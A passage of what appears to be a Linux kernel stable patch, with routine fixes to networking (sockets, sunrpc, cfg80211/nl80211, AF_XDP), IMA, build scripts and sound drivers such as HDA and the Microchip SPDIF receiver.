+-			       sizeof(struct smcd_cdc_msg));
++			memzero_explicit(conn->rmb_desc->cpu_addr,
++					 conn->rmb_desc->len + sizeof(struct smcd_cdc_msg));
++			WRITE_ONCE(conn->rmb_desc->used, 0);
+ 		}
+ 	}
+ }
+diff --git a/net/socket.c b/net/socket.c
+index 29a4bad1b1d81..577079a8935fa 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -449,7 +449,9 @@ static struct file_system_type sock_fs_type = {
+  *
+  *	Returns the &file bound with @sock, implicitly storing it
+  *	in sock->file. If dname is %NULL, sets to "".
+- *	On failure the return is a ERR pointer (see linux/err.h).
++ *
++ *	On failure @sock is released, and an ERR pointer is returned.
++ *
+  *	This function uses GFP_KERNEL internally.
+  */
+ 
+@@ -1613,7 +1615,6 @@ static struct socket *__sys_socket_create(int family, int type, int protocol)
+ struct file *__sys_socket_file(int family, int type, int protocol)
+ {
+ 	struct socket *sock;
+-	struct file *file;
+ 	int flags;
+ 
+ 	sock = __sys_socket_create(family, type, protocol);
+@@ -1624,11 +1625,7 @@ struct file *__sys_socket_file(int family, int type, int protocol)
+ 	if (SOCK_NONBLOCK != O_NONBLOCK && (flags & SOCK_NONBLOCK))
+ 		flags = (flags & ~SOCK_NONBLOCK) | O_NONBLOCK;
+ 
+-	file = sock_alloc_file(sock, flags, NULL);
+-	if (IS_ERR(file))
+-		sock_release(sock);
+-
+-	return file;
++	return sock_alloc_file(sock, flags, NULL);
+ }
+ 
+ int __sys_socket(int family, int type, int protocol)
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 0b0b9f1eed469..fd7e1c630493e 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -3350,6 +3350,8 @@ rpc_clnt_swap_deactivate_callback(struct rpc_clnt *clnt,
+ void
+ rpc_clnt_swap_deactivate(struct rpc_clnt *clnt)
+ {
++	while (clnt != clnt->cl_parent)
++		clnt = clnt->cl_parent;
+ 	if (atomic_dec_if_positive(&clnt->cl_swapper) == 0)
+ 		rpc_clnt_iterate_for_each_xprt(clnt,
+ 				rpc_clnt_swap_deactivate_callback, NULL);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index d2321c6833985..4d4de49f7ab65 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -13808,7 +13808,7 @@ static int nl80211_set_rekey_data(struct sk_buff *skb, struct genl_info *info)
+ 		return -ERANGE;
+ 	if (nla_len(tb[NL80211_REKEY_DATA_KCK]) != NL80211_KCK_LEN &&
+ 	    !(rdev->wiphy.flags & WIPHY_FLAG_SUPPORTS_EXT_KEK_KCK &&
+-	      nla_len(tb[NL80211_REKEY_DATA_KEK]) == NL80211_KCK_EXT_LEN))
++	      nla_len(tb[NL80211_REKEY_DATA_KCK]) == NL80211_KCK_EXT_LEN))
+ 		return -ERANGE;
+ 
+ 	rekey_data.kek = nla_data(tb[NL80211_REKEY_DATA_KEK]);
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index d513536617bd9..89fc5683ed26c 100644
+--- a/net/wireless/sme.c
++++ b/net/wireless/sme.c
+@@ -285,6 +285,15 @@ void cfg80211_conn_work(struct work_struct *work)
+ 	wiphy_unlock(&rdev->wiphy);
+ }
+ 
++static void cfg80211_step_auth_next(struct cfg80211_conn *conn,
++				    struct cfg80211_bss *bss)
++{
++	memcpy(conn->bssid, bss->bssid, ETH_ALEN);
++	conn->params.bssid = conn->bssid;
++	conn->params.channel = bss->channel;
++	conn->state = CFG80211_CONN_AUTHENTICATE_NEXT;
++}
++
+ /* Returned bss is reference counted and must be cleaned up appropriately. */
+ static struct cfg80211_bss *cfg80211_get_conn_bss(struct wireless_dev *wdev)
+ {
+@@ -302,10 +311,7 @@ static struct cfg80211_bss *cfg80211_get_conn_bss(struct wireless_dev *wdev)
+ 	if (!bss)
+ 		return NULL;
+ 
+-	memcpy(wdev->conn->bssid, bss->bssid, ETH_ALEN);
+-	wdev->conn->params.bssid = wdev->conn->bssid;
+-	wdev->conn->params.channel = bss->channel;
+-	wdev->conn->state = CFG80211_CONN_AUTHENTICATE_NEXT;
++	cfg80211_step_auth_next(wdev->conn, bss);
+ 	schedule_work(&rdev->conn_work);
+ 
+ 	return bss;
+@@ -597,7 +603,12 @@ static int cfg80211_sme_connect(struct wireless_dev *wdev,
+ 	wdev->conn->params.ssid_len = wdev->u.client.ssid_len;
+ 
+ 	/* see if we have the bss already */
+-	bss = cfg80211_get_conn_bss(wdev);
++	bss = cfg80211_get_bss(wdev->wiphy, wdev->conn->params.channel,
++			       wdev->conn->params.bssid,
++			       wdev->conn->params.ssid,
++			       wdev->conn->params.ssid_len,
++			       wdev->conn_bss_type,
++			       IEEE80211_PRIVACY(wdev->conn->params.privacy));
+ 
+ 	if (prev_bssid) {
+ 		memcpy(wdev->conn->prev_bssid, prev_bssid, ETH_ALEN);
+@@ -608,6 +619,7 @@ static int cfg80211_sme_connect(struct wireless_dev *wdev,
+ 	if (bss) {
+ 		enum nl80211_timeout_reason treason;
+ 
++		cfg80211_step_auth_next(wdev->conn, bss);
+ 		err = cfg80211_conn_do_work(wdev, &treason);
+ 		cfg80211_put_bss(wdev->wiphy, bss);
+ 	} else {
+@@ -724,6 +736,7 @@ void __cfg80211_connect_result(struct net_device *dev,
+ {
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+ 	const struct element *country_elem = NULL;
++	const struct element *ssid;
+ 	const u8 *country_data;
+ 	u8 country_datalen;
+ #ifdef CONFIG_CFG80211_WEXT
+@@ -869,6 +882,22 @@ void __cfg80211_connect_result(struct net_device *dev,
+ 				   country_data, country_datalen);
+ 	kfree(country_data);
+ 
++	if (!wdev->u.client.ssid_len) {
++		rcu_read_lock();
++		for_each_valid_link(cr, link) {
++			ssid = ieee80211_bss_get_elem(cr->links[link].bss,
++						      WLAN_EID_SSID);
++
++			if (!ssid || !ssid->datalen)
++				continue;
++
++			memcpy(wdev->u.client.ssid, ssid->data, ssid->datalen);
++			wdev->u.client.ssid_len = ssid->datalen;
++			break;
++		}
++		rcu_read_unlock();
++	}
++
+ 	return;
+ out:
+ 	for_each_valid_link(cr, link)
+@@ -1450,6 +1479,15 @@ int cfg80211_connect(struct cfg80211_registered_device *rdev,
+ 	} else {
+ 		if (WARN_ON(connkeys))
+ 			return -EINVAL;
++
++		/* connect can point to wdev->wext.connect which
++		 * can hold key data from a previous connection
++		 */
++		connect->key = NULL;
++		connect->key_len = 0;
++		connect->key_idx = 0;
++		connect->crypto.cipher_group = 0;
++		connect->crypto.n_ciphers_pairwise = 0;
+ 	}
+ 
+ 	wdev->connect_keys = connkeys;
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 9f0561b67c12e..13f62d2402e71 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -511,7 +511,7 @@ static struct sk_buff *xsk_build_skb(struct xdp_sock *xs,
+ 	return skb;
+ }
+ 
+-static int xsk_generic_xmit(struct sock *sk)
++static int __xsk_generic_xmit(struct sock *sk)
+ {
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	u32 max_batch = TX_BATCH_SIZE;
+@@ -594,22 +594,13 @@ out:
+ 	return err;
+ }
+ 
+-static int xsk_xmit(struct sock *sk)
++static int xsk_generic_xmit(struct sock *sk)
+ {
+-	struct xdp_sock *xs = xdp_sk(sk);
+ 	int ret;
+ 
+-	if (unlikely(!(xs->dev->flags & IFF_UP)))
+-		return -ENETDOWN;
+-	if (unlikely(!xs->tx))
+-		return -ENOBUFS;
+-
+-	if (xs->zc)
+-		return xsk_wakeup(xs, XDP_WAKEUP_TX);
+-
+ 	/* Drop the RCU lock since the SKB path might sleep. */
+ 	rcu_read_unlock();
+-	ret = xsk_generic_xmit(sk);
++	ret = __xsk_generic_xmit(sk);
+ 	/* Reaquire RCU lock before going into common code. */
+ 	rcu_read_lock();
+ 
+@@ -627,17 +618,31 @@ static bool xsk_no_wakeup(struct sock *sk)
+ #endif
+ }
+ 
++static int xsk_check_common(struct xdp_sock *xs)
++{
++	if (unlikely(!xsk_is_bound(xs)))
++		return -ENXIO;
++	if (unlikely(!(xs->dev->flags & IFF_UP)))
++		return -ENETDOWN;
++
++	return 0;
++}
++
+ static int __xsk_sendmsg(struct socket *sock, struct msghdr *m, size_t total_len)
+ {
+ 	bool need_wait = !(m->msg_flags & MSG_DONTWAIT);
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	struct xsk_buff_pool *pool;
++	int err;
+ 
+-	if (unlikely(!xsk_is_bound(xs)))
+-		return -ENXIO;
++	err = xsk_check_common(xs);
++	if (err)
++		return err;
+ 	if (unlikely(need_wait))
+ 		return -EOPNOTSUPP;
++	if (unlikely(!xs->tx))
++		return -ENOBUFS;
+ 
+ 	if (sk_can_busy_loop(sk)) {
+ 		if (xs->zc)
+@@ -649,8 +654,11 @@ static int __xsk_sendmsg(struct socket *sock, struct msghdr *m, size_t total_len
+ 		return 0;
+ 
+ 	pool = xs->pool;
+-	if (pool->cached_need_wakeup & XDP_WAKEUP_TX)
+-		return xsk_xmit(sk);
++	if (pool->cached_need_wakeup & XDP_WAKEUP_TX) {
++		if (xs->zc)
++			return xsk_wakeup(xs, XDP_WAKEUP_TX);
++		return xsk_generic_xmit(sk);
++	}
+ 	return 0;
+ }
+ 
+@@ -670,11 +678,11 @@ static int __xsk_recvmsg(struct socket *sock, struct msghdr *m, size_t len, int
+ 	bool need_wait = !(flags & MSG_DONTWAIT);
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
++	int err;
+ 
+-	if (unlikely(!xsk_is_bound(xs)))
+-		return -ENXIO;
+-	if (unlikely(!(xs->dev->flags & IFF_UP)))
+-		return -ENETDOWN;
++	err = xsk_check_common(xs);
++	if (err)
++		return err;
+ 	if (unlikely(!xs->rx))
+ 		return -ENOBUFS;
+ 	if (unlikely(need_wait))
+@@ -713,21 +721,20 @@ static __poll_t xsk_poll(struct file *file, struct socket *sock,
+ 	sock_poll_wait(file, sock, wait);
+ 
+ 	rcu_read_lock();
+-	if (unlikely(!xsk_is_bound(xs))) {
+-		rcu_read_unlock();
+-		return mask;
+-	}
++	if (xsk_check_common(xs))
++		goto skip_tx;
+ 
+ 	pool = xs->pool;
+ 
+ 	if (pool->cached_need_wakeup) {
+ 		if (xs->zc)
+ 			xsk_wakeup(xs, pool->cached_need_wakeup);
+-		else
++		else if (xs->tx)
+ 			/* Poll needs to drive Tx also in copy mode */
+-			xsk_xmit(sk);
++			xsk_generic_xmit(sk);
+ 	}
+ 
++skip_tx:
+ 	if (xs->rx && !xskq_prod_is_empty(xs->rx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 	if (xs->tx && xsk_tx_writeable(xs))
+diff --git a/scripts/gcc-plugins/Makefile b/scripts/gcc-plugins/Makefile
+index b34d11e226366..320afd3cf8e82 100644
+--- a/scripts/gcc-plugins/Makefile
++++ b/scripts/gcc-plugins/Makefile
+@@ -29,7 +29,7 @@ GCC_PLUGINS_DIR = $(shell $(CC) -print-file-name=plugin)
+ plugin_cxxflags	= -Wp,-MMD,$(depfile) $(KBUILD_HOSTCXXFLAGS) -fPIC \
+ 		  -include $(srctree)/include/linux/compiler-version.h \
+ 		  -DPLUGIN_VERSION=$(call stringify,$(KERNELVERSION)) \
+-		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) -std=gnu++11 \
++		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) \
+ 		  -fno-rtti -fno-exceptions -fasynchronous-unwind-tables \
+ 		  -ggdb -Wno-narrowing -Wno-unused-variable \
+ 		  -Wno-format-diag
+diff --git a/scripts/package/mkdebian b/scripts/package/mkdebian
+index a3ac5a716e9fc..5be7e627e7513 100755
+--- a/scripts/package/mkdebian
++++ b/scripts/package/mkdebian
+@@ -236,7 +236,7 @@ binary-arch: build-arch
+ 	KBUILD_BUILD_VERSION=${revision} -f \$(srctree)/Makefile intdeb-pkg
+ 
+ clean:
+-	rm -rf debian/*tmp debian/files
++	rm -rf debian/files debian/linux-*
+ 	\$(MAKE) clean
+ 
+ binary: binary-arch
+diff --git a/security/integrity/ima/ima_api.c b/security/integrity/ima/ima_api.c
+index c1e76282b5ee5..1e3a7a4f8833f 100644
+--- a/security/integrity/ima/ima_api.c
++++ b/security/integrity/ima/ima_api.c
+@@ -292,7 +292,7 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 		result = ima_calc_file_hash(file, &hash.hdr);
+ 	}
+ 
+-	if (result == -ENOMEM)
++	if (result && result != -EBADF && result != -EINVAL)
+ 		goto out;
+ 
+ 	length = sizeof(hash.hdr) + hash.hdr.length;
+diff --git a/security/integrity/ima/ima_main.c b/security/integrity/ima/ima_main.c
+index 4a207a3ef7ef3..bc84a0ac25aaa 100644
+--- a/security/integrity/ima/ima_main.c
++++ b/security/integrity/ima/ima_main.c
+@@ -335,7 +335,7 @@ static int process_measurement(struct file *file, const struct cred *cred,
+ 	hash_algo = ima_get_hash_algo(xattr_value, xattr_len);
+ 
+ 	rc = ima_collect_measurement(iint, file, buf, size, hash_algo, modsig);
+-	if (rc == -ENOMEM)
++	if (rc != 0 && rc != -EBADF && rc != -EINVAL)
+ 		goto out_locked;
+ 
+ 	if (!pathbuf)	/* ima_rdwr_violation possibly pre-fetched */
+@@ -395,7 +395,9 @@ out:
+ /**
+  * ima_file_mmap - based on policy, collect/store measurement.
+  * @file: pointer to the file to be measured (May be NULL)
+- * @prot: contains the protection that will be applied by the kernel.
++ * @reqprot: protection requested by the application
++ * @prot: protection that will be applied by the kernel
++ * @flags: operational flags
+  *
+  * Measure files being mmapped executable based on the ima_must_measure()
+  * policy decision.
+@@ -403,7 +405,8 @@ out:
+  * On success return 0.  On integrity appraisal error, assuming the file
+  * is in policy and IMA-appraisal is in enforcing mode, return -EACCES.
+  */
+-int ima_file_mmap(struct file *file, unsigned long prot)
++int ima_file_mmap(struct file *file, unsigned long reqprot,
++		  unsigned long prot, unsigned long flags)
+ {
+ 	u32 secid;
+ 
+diff --git a/security/security.c b/security/security.c
+index 79d82cb6e4696..75dc0947ee0cf 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -1591,12 +1591,13 @@ static inline unsigned long mmap_prot(struct file *file, unsigned long prot)
+ int security_mmap_file(struct file *file, unsigned long prot,
+ 			unsigned long flags)
+ {
++	unsigned long prot_adj = mmap_prot(file, prot);
+ 	int ret;
+-	ret = call_int_hook(mmap_file, 0, file, prot,
+-					mmap_prot(file, prot), flags);
++
++	ret = call_int_hook(mmap_file, 0, file, prot, prot_adj, flags);
+ 	if (ret)
+ 		return ret;
+-	return ima_file_mmap(file, prot);
++	return ima_file_mmap(file, prot, prot_adj, flags);
+ }
+ 
+ int security_mmap_addr(unsigned long addr)
+diff --git a/sound/pci/hda/Kconfig b/sound/pci/hda/Kconfig
+index a8e8cf98befa1..d29d8372a3c04 100644
+--- a/sound/pci/hda/Kconfig
++++ b/sound/pci/hda/Kconfig
+@@ -302,6 +302,20 @@ config SND_HDA_INTEL_HDMI_SILENT_STREAM
+ 	  This feature can impact power consumption as resources
+ 	  are kept reserved both at transmitter and receiver.
+ 
++config SND_HDA_CTL_DEV_ID
++	bool "Use the device identifier field for controls"
++	depends on SND_HDA_INTEL
++	help
++	  Say Y to use the device identifier field for (mixer)
++	  controls (old behaviour until this option is available).
++
++	  When enabled, the multiple HDA codecs may set the device
++	  field in control (mixer) element identifiers. The use
++	  of this field is not recommended and defined for mixer controls.
++
++	  The old behaviour (Y) is obsolete and will be removed. Consider
++	  to not enable this option.
++
+ endif
+ 
+ endmenu
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index 2e728aad67713..9f79c0ac2bda7 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -3389,7 +3389,12 @@ int snd_hda_add_new_ctls(struct hda_codec *codec,
+ 			kctl = snd_ctl_new1(knew, codec);
+ 			if (!kctl)
+ 				return -ENOMEM;
+-			if (addr > 0)
++			/* Do not use the id.device field for MIXER elements.
++			 * This field is for real device numbers (like PCM) but codecs
++			 * are hidden components from the user space view (unrelated
++			 * to the mixer element identification).
++			 */
++			if (addr > 0 && codec->ctl_dev_id)
+ 				kctl->id.device = addr;
+ 			if (idx > 0)
+ 				kctl->id.index = idx;
+@@ -3400,9 +3405,11 @@ int snd_hda_add_new_ctls(struct hda_codec *codec,
+ 			 * the codec addr; if it still fails (or it's the
+ 			 * primary codec), then try another control index
+ 			 */
+-			if (!addr && codec->core.addr)
++			if (!addr && codec->core.addr) {
+ 				addr = codec->core.addr;
+-			else if (!idx && !knew->index) {
++				if (!codec->ctl_dev_id)
++					idx += 10 * addr;
++			} else if (!idx && !knew->index) {
+ 				idx = find_empty_mixer_ctl_idx(codec,
+ 							       knew->name, 0);
+ 				if (idx <= 0)
+diff --git a/sound/pci/hda/hda_controller.c b/sound/pci/hda/hda_controller.c
+index 0ff286b7b66be..083df287c1a48 100644
+--- a/sound/pci/hda/hda_controller.c
++++ b/sound/pci/hda/hda_controller.c
+@@ -1231,6 +1231,7 @@ int azx_probe_codecs(struct azx *chip, unsigned int max_slots)
+ 				continue;
+ 			codec->jackpoll_interval = chip->jackpoll_interval;
+ 			codec->beep_mode = chip->beep_mode;
++			codec->ctl_dev_id = chip->ctl_dev_id;
+ 			codecs++;
+ 		}
+ 	}
+diff --git a/sound/pci/hda/hda_controller.h b/sound/pci/hda/hda_controller.h
+index f5bf295eb8307..8556031bcd68e 100644
+--- a/sound/pci/hda/hda_controller.h
++++ b/sound/pci/hda/hda_controller.h
+@@ -124,6 +124,7 @@ struct azx {
+ 	/* HD codec */
+ 	int  codec_probe_mask; /* copied from probe_mask option */
+ 	unsigned int beep_mode;
++	bool ctl_dev_id;
+ 
+ #ifdef CONFIG_SND_HDA_PATCH_LOADER
+ 	const struct firmware *fw;
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 87002670c0c92..81c4a45254ff2 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -50,6 +50,7 @@
+ #include <sound/intel-dsp-config.h>
+ #include <linux/vgaarb.h>
+ #include <linux/vga_switcheroo.h>
++#include <linux/apple-gmux.h>
+ #include <linux/firmware.h>
+ #include <sound/hda_codec.h>
+ #include "hda_controller.h"
+@@ -119,6 +120,7 @@ static bool beep_mode[SNDRV_CARDS] = {[0 ... (SNDRV_CARDS-1)] =
+ 					CONFIG_SND_HDA_INPUT_BEEP_MODE};
+ #endif
+ static bool dmic_detect = 1;
++static bool ctl_dev_id = IS_ENABLED(CONFIG_SND_HDA_CTL_DEV_ID) ? 1 : 0;
+ 
+ module_param_array(index, int, NULL, 0444);
+ MODULE_PARM_DESC(index, "Index value for Intel HD audio interface.");
+@@ -157,6 +159,8 @@ module_param(dmic_detect, bool, 0444);
+ MODULE_PARM_DESC(dmic_detect, "Allow DSP driver selection (bypass this driver) "
+ 			     "(0=off, 1=on) (default=1); "
+ 		 "deprecated, use snd-intel-dspcfg.dsp_driver option instead");
++module_param(ctl_dev_id, bool, 0444);
++MODULE_PARM_DESC(ctl_dev_id, "Use control device identifier (based on codec address).");
+ 
+ #ifdef CONFIG_PM
+ static int param_set_xint(const char *val, const struct kernel_param *kp);
+@@ -1463,7 +1467,7 @@ static struct pci_dev *get_bound_vga(struct pci_dev *pci)
+ 				 * vgaswitcheroo.
+ 				 */
+ 				if (((p->class >> 16) == PCI_BASE_CLASS_DISPLAY) &&
+-				    atpx_present())
++				    (atpx_present() || apple_gmux_detect(NULL, NULL)))
+ 					return p;
+ 				pci_dev_put(p);
+ 			}
+@@ -2278,6 +2282,8 @@ static int azx_probe_continue(struct azx *chip)
+ 	chip->beep_mode = beep_mode[dev];
+ #endif
+ 
++	chip->ctl_dev_id = ctl_dev_id;
++
+ 	/* create codec instances */
+ 	if (bus->codec_mask) {
+ 		err = azx_probe_codecs(chip, azx_max_codecs[chip->driver_type]);
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index 0a292bf271f2e..acde4cd58785e 100644
+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -2455,7 +2455,7 @@ static int dspio_set_uint_param(struct hda_codec *codec, int mod_id,
+ static int dspio_alloc_dma_chan(struct hda_codec *codec, unsigned int *dma_chan)
+ {
+ 	int status = 0;
+-	unsigned int size = sizeof(dma_chan);
++	unsigned int size = sizeof(*dma_chan);
+ 
+ 	codec_dbg(codec, "     dspio_alloc_dma_chan() -- begin\n");
+ 	status = dspio_scp(codec, MASTERCONTROL, 0x20,
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e103bb3693c06..d4819890374b5 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11617,6 +11617,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1028, 0x0698, "Dell", ALC668_FIXUP_DELL_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x069f, "Dell", ALC668_FIXUP_DELL_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x1632, "HP RP5800", ALC662_FIXUP_HP_RP5800),
++	SND_PCI_QUIRK(0x103c, 0x870c, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x8719, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x873e, "HP", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x877e, "HP 288 Pro G6", ALC671_FIXUP_HP_HEADSET_MIC2),
+diff --git a/sound/pci/ice1712/aureon.c b/sound/pci/ice1712/aureon.c
+index 9a30f6d35d135..40a0e00950301 100644
+--- a/sound/pci/ice1712/aureon.c
++++ b/sound/pci/ice1712/aureon.c
+@@ -1892,6 +1892,7 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 		unsigned char id;
+ 		snd_ice1712_save_gpio_status(ice);
+ 		id = aureon_cs8415_get(ice, CS8415_ID);
++		snd_ice1712_restore_gpio_status(ice);
+ 		if (id != 0x41)
+ 			dev_info(ice->card->dev,
+ 				 "No CS8415 chip. Skipping CS8415 controls.\n");
+@@ -1909,7 +1910,6 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 					kctl->id.device = ice->pcm->device;
+ 			}
+ 		}
+-		snd_ice1712_restore_gpio_status(ice);
+ 	}
+ 
+ 	return 0;
+diff --git a/sound/soc/atmel/mchp-spdifrx.c b/sound/soc/atmel/mchp-spdifrx.c
+index ec0705cc40fab..76ce37f641ebd 100644
+--- a/sound/soc/atmel/mchp-spdifrx.c
++++ b/sound/soc/atmel/mchp-spdifrx.c
+@@ -217,7 +217,6 @@ struct mchp_spdifrx_ch_stat {
+ struct mchp_spdifrx_user_data {
+ 	unsigned char data[SPDIFRX_UD_BITS / 8];
+ 	struct completion done;
+-	spinlock_t lock;	/* protect access to user data */
+ };
+ 
+ struct mchp_spdifrx_mixer_control {
+@@ -231,13 +230,13 @@ struct mchp_spdifrx_mixer_control {
+ struct mchp_spdifrx_dev {
+ 	struct snd_dmaengine_dai_dma_data	capture;
+ 	struct mchp_spdifrx_mixer_control	control;
+-	spinlock_t				blockend_lock;	/* protect access to blockend_refcount */
+-	int					blockend_refcount;
++	struct mutex				mlock;
+ 	struct device				*dev;
+ 	struct regmap				*regmap;
+ 	struct clk				*pclk;
+ 	struct clk				*gclk;
+ 	unsigned int				fmt;
++	unsigned int				trigger_enabled;
+ 	unsigned int				gclk_enabled:1;
+ };
+ 
+@@ -275,37 +274,11 @@ static void mchp_spdifrx_channel_user_data_read(struct mchp_spdifrx_dev *dev,
+ 	}
+ }
+ 
+-/* called from non-atomic context only */
+-static void mchp_spdifrx_isr_blockend_en(struct mchp_spdifrx_dev *dev)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&dev->blockend_lock, flags);
+-	dev->blockend_refcount++;
+-	/* don't enable BLOCKEND interrupt if it's already enabled */
+-	if (dev->blockend_refcount == 1)
+-		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_BLOCKEND);
+-	spin_unlock_irqrestore(&dev->blockend_lock, flags);
+-}
+-
+-/* called from atomic/non-atomic context */
+-static void mchp_spdifrx_isr_blockend_dis(struct mchp_spdifrx_dev *dev)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&dev->blockend_lock, flags);
+-	dev->blockend_refcount--;
+-	/* don't enable BLOCKEND interrupt if it's already enabled */
+-	if (dev->blockend_refcount == 0)
+-		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
+-	spin_unlock_irqrestore(&dev->blockend_lock, flags);
+-}
+-
+ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ {
+ 	struct mchp_spdifrx_dev *dev = dev_id;
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+-	u32 sr, imr, pending, idr = 0;
++	u32 sr, imr, pending;
+ 	irqreturn_t ret = IRQ_NONE;
+ 	int ch;
+ 
+@@ -320,13 +293,10 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 
+ 	if (pending & SPDIFRX_IR_BLOCKEND) {
+ 		for (ch = 0; ch < SPDIFRX_CHANNELS; ch++) {
+-			spin_lock(&ctrl->user_data[ch].lock);
+ 			mchp_spdifrx_channel_user_data_read(dev, ch);
+-			spin_unlock(&ctrl->user_data[ch].lock);
+-
+ 			complete(&ctrl->user_data[ch].done);
+ 		}
+-		mchp_spdifrx_isr_blockend_dis(dev);
++		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+@@ -334,7 +304,7 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 		if (pending & SPDIFRX_IR_CSC(ch)) {
+ 			mchp_spdifrx_channel_status_read(dev, ch);
+ 			complete(&ctrl->ch_stat[ch].done);
+-			idr |= SPDIFRX_IR_CSC(ch);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_CSC(ch));
+ 			ret = IRQ_HANDLED;
+ 		}
+ 	}
+@@ -344,8 +314,6 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+-	regmap_write(dev->regmap, SPDIFRX_IDR, idr);
+-
+ 	return ret;
+ }
+ 
+@@ -353,47 +321,40 @@ static int mchp_spdifrx_trigger(struct snd_pcm_substream *substream, int cmd,
+ 				struct snd_soc_dai *dai)
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+-	u32 mr;
+-	int running;
+-	int ret;
+-
+-	regmap_read(dev->regmap, SPDIFRX_MR, &mr);
+-	running = !!(mr & SPDIFRX_MR_RXEN_ENABLE);
++	int ret = 0;
+ 
+ 	switch (cmd) {
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		if (!running) {
+-			mr &= ~SPDIFRX_MR_RXEN_MASK;
+-			mr |= SPDIFRX_MR_RXEN_ENABLE;
+-			/* enable overrun interrupts */
+-			regmap_write(dev->regmap, SPDIFRX_IER,
+-				     SPDIFRX_IR_OVERRUN);
+-		}
++		mutex_lock(&dev->mlock);
++		/* Enable overrun interrupts */
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_OVERRUN);
++
++		/* Enable receiver. */
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_ENABLE);
++		dev->trigger_enabled = true;
++		mutex_unlock(&dev->mlock);
+ 		break;
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_SUSPEND:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		if (running) {
+-			mr &= ~SPDIFRX_MR_RXEN_MASK;
+-			mr |= SPDIFRX_MR_RXEN_DISABLE;
+-			/* disable overrun interrupts */
+-			regmap_write(dev->regmap, SPDIFRX_IDR,
+-				     SPDIFRX_IR_OVERRUN);
+-		}
++		mutex_lock(&dev->mlock);
++		/* Disable overrun interrupts */
++		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_OVERRUN);
++
++		/* Disable receiver. */
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_DISABLE);
++		dev->trigger_enabled = false;
++		mutex_unlock(&dev->mlock);
+ 		break;
+ 	default:
+-		return -EINVAL;
+-	}
+-
+-	ret = regmap_write(dev->regmap, SPDIFRX_MR, mr);
+-	if (ret) {
+-		dev_err(dev->dev, "unable to enable/disable RX: %d\n", ret);
+-		return ret;
++		ret = -EINVAL;
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+@@ -401,7 +362,7 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 				  struct snd_soc_dai *dai)
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+-	u32 mr;
